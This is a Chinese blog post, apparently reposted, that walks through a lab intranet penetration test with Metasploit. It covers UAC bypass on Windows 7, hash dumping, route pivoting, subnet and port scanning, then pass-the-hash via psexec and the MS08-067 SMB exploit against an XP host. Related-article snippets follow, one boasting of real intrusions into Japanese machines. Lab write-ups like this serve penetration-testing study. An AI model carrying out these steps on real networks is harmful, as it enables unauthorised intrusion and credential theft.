内网渗透bypassuac和smb溢出

最新推荐文章于 2024-09-14 19:55:29 发布
最新推荐文章于 2024-09-14 19:55:29 发布
阅读量109 收藏
点赞数
文章标签: 网络 shell
原文链接:http://www.cnblogs.com/-qing-/p/10128930.html
版权

对内网渗透需要渗透的目标主机处于跨网段和uac限制的情况做一个渗透记录

 

环境大致如下 拥有shell权限的win7(uac限制,处于双网段) 和同win7同一网段下暂时无权限的靶机xp

 

先对有权限的win7进行hashdump

 

 

显示失败 getsystem一下

 

 还是失败 msf的模块绕过uac

use exploit/windows/local/bypassuac

 

set session 1(session1 为我们的win7权限)

 

此时再进入meterpreter  hashdumpgetsystem

 

可以看到绕过了uac  获得了权限

 

导出了hash 接下来对和win7同网段的xp进行扫描探测

 

得到本地子网网段

run get_local_subnets

 

处于192.168.100.0 子网掩码为255.255.255.0这个网段

run autoroute  -s 网段  添加路由  -p 查看已经添加的路由

 

添加完成后  开始扫描

扫描存活ip

run post/windows/gather/arp_scanner RHOST=网段

 

发现内网以下存在这些主机 其中192.168.100.5 是目标xp

 

 确定了目标 接下来扫描端口

 

扫描端口

run axiliary/scanner/portscan/tcp

 

 

 

探测完信息后

 

可以通过之前抓的hash值 进行hash传递攻击

 

使用msf 下的exploit/windows/smb/psexec

 

 

 

也可以通过对应服务溢出漏洞 渗透拿到目标xp的权限

 

 

 

 

 开放了smb 使用了ms08_067 溢出成功

 

转载于:https://www.cnblogs.com/-qing-/p/10128930.html

weixin_30526593
关注
红队内网攻防渗透:内网渗透之内网各种工具平台的使用
HACKONE的博客
04-10 289
红队内网攻防渗透内网各种工具平台的使用 内网各种工具平台的使用
[原创]Ladon7.5大型内网渗透扫描器&Cobalt Strike
热门推荐
K8哥哥
11-10 1万+
Ladon一款用于大型网络渗透的多线程插件化综合扫描神器,含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描。5.5版本内置39个功能模块,通过多种协议以及方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、数据库等信息,漏洞检测包含MS17010、Weblogic、ActiveMQ、Tomcat、Struts2等,密码爆破11种含数据
关于445端口 SMB-NTML-SSP漏洞 嗅探远程主机基本信息的利用过程
全栈胖叔叔
05-08 1164
我们都知道,一般开共享的主机,默认都打开139和445端口, 也就是开启SMB服务,但是这两个端口经常被不法分子利用,比较经典的针对这两个端口的入侵就是IPC$管道,结合TFTP,利用任务计划完全控制远程主机,2004年那会,参加中日黑客大战的时候,日本的机器基本上全都是2000/NT的系统,远程扫描挂密码表,获取NT口令以后,远程开3389或者上灰鸽子,攻陷了好多日本的主机,当然这种方法很低级,高级的可以用Sqlhello ,远程堆栈缓冲区溢出,然后NC反向监听1433端口,就可以获得system32-
044 口令破解
鸡蛋炒鸡蛋
02-22 2788
文章目录一:口令安全概述二:口令安全现状三:破解方式3.1:在线破解方式3.2:离线破解方式3.3:暴力破解3.4:字典破解3.4.1:密码字典的分类——弱口令字典3.4.2:密码字典的分类——社工字典3.4.3:密码字典的分类——字符集字典四:平常可以收集的字典五:口令破解5.1 windows口令远程爆破5.2 windows账号hash值破解5.3 linux口令破解5.4 网络服务口令破解六:MSF-SMB源码 一:口令安全概述 现在很多地方都以用户名(账号)和口令(密码)做为鉴权的方式,口令就意味
一款以Python编码的自动化大规模漏洞测试工具
python学习者的博客
08-20 2500
可能大家之前已经使用过AutpSploit这款自动化漏洞利用工具了,但是这款工具现在又进行了大幅度改进。 AutoSploit= Shodan/Censys/Zoomeye + Metasploit 可能大家之前已经使用过AutpSploit这款自动化漏洞利用工具了,但是这款工具现在又进行了大幅度改进。 AutoSploit是什么? AutoSploit是一款采用Python开发的自动化大...
在BT5里Metasploit内网***(exploit/windows/smb/psexec)
weixin_33676492的博客
01-01 1297
使用 BT5 破解***内部网络目标IP地址192.168.111.135 (windows server 2003 sp2)bt5 的IP地址192.168.111.134***条件:知道目标机器的ip 用户名 密码因为非法测试是不允许的,所以我在虚拟机里面实验首先,我们来查看bt5和win2k3的ip地址进入msfconsole进行***实验实验使用的漏洞是explo...
红队专题-内网横向-工作组Workgroup与 Domain Active Directory域渗透
aming小老弟
12-21 1257
通过使用活动目录,管理员能够中心化、批量地更新和管理操作系统、应用、用户以及对数据的访问,而用户和管理员也能很容易地获取这些信息。而且因为活动目录具备中心化的管理能力,攻击者一旦获得域管理员权限,即可控制域内所有用户和主机,因此活动目录域环境也备受攻击者青睐。实际上LSA保护不能抵御这些攻击,它只会让你在执行这些攻击前,需要做一些额外的操作,让攻击变得更加困难一些。此功能基于PPL技术,它是一种纵深防御的安全功能,旨在“防止非管理员非PPL进程通过打开进程之类的函数串改PPL进程的代码和数据”。
内网渗透之小试牛刀
SoulCat
03-02 1952
sqlsever手把手注入 所谓,一见钟情不过见色起意,日久生情不过权衡利弊。人生来就是孤单的。 文章目录sqlsever手把手注入判断:MSSQL注入:多种注入:绕waf: 判断: 首先判断数据库 Access: and (select count (*) from MSysAccessObjects) >0 MSSQL: and (select count (*) from ...
渗透测试学习目录
liupc的学习笔记
05-04 3337
1. 行业术语扫盲 2. 3.
内网渗透之 windows 基础
qq_49433473的博客
10-16 4470
windows用户、组、SID以及基本命令,了解windows 认证及密码、windows UAC机制、认识 windows ASR以及Windows Applocker,Token的组成,Windows PowerShell的使用与绕过方式、最后认识域
详解Bypass UAC过程中踩过的坑(第一部分)
weixin_34178244的博客
09-18 1292
本文讲的是详解Bypass UAC过程中踩过的坑(第一部分),我目前正在尝试对Chrome沙盒进行一些改进。而作为其中的一部分,我现在正在对我的沙盒攻击Surface 分析工具进行更新,因为我想衡量我对Chrome做的事情是否具有实际的安全性。但事实上当我在进行这一切时,我一直躲不开绕过UAC的麻烦,这就导致进程出现了问题。所以为了顺便演示下我以前在UA...
Windows10 bypassUAC绕过用户账户控制
weixin_33858249的博客
12-27 826
版权声明:本文可能为博主原创文章,若标明出处可随便转载。 https://blog.csdn.net/Jailman/article/details/85274242 使用这个github上的...
bypassUAC
火柴人的博客
05-17 247
https://www.anquanke.com/post/id/163222 我有个bypassUAC想给你讲
4.网络编程
最新发布
weixin_45476535的博客
09-14 492
程序注册端口:1024-49151。单个协议下,端口号不能冲突。公有端口0-1023。
Java-网络
2301_81543552的博客
09-14 698
Java中的网络编程主要涉及使用Socket类进行网络通信,以及理解各种网络协议。以下是一些关键概念和示例代码,帮助您入门。
使用堡垒机登录ftp服务报网络不可达错误
ajax_beijing_java的博客
09-14 208
解决方法:由于不想安装额外的服务在服务器上,于是想到使用sftp服务代替ftp服务,发现是可以使用的。22端口默认就是启动的,在堡垒机上加了sftp服务,再次连接服务器并使用filezila传输文件 ,文件可以正常传输。至此,问题得到解决。场景:开发同事想使用ftp传输服务,连接服务器时报网络不可达错误。排查发现,如果想使用ftp服务,需要在服务器上部署ftp服务,21端口才会存在,才可以访问该服务。
WireShark分析localhost包
ngczx的博客
09-11 716
WireShark分析localhost包
黑客内网渗透技术解析
在安全措施日益增强的今天,外网渗透变得越来越困难,因此内网渗透成为黑客寻找敏感信息和控制目标系统的关键途径。下面我们将详细探讨内网渗透中的常见步骤和技巧。 1. **信息刺探**: - **人物身份分析**:了解...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值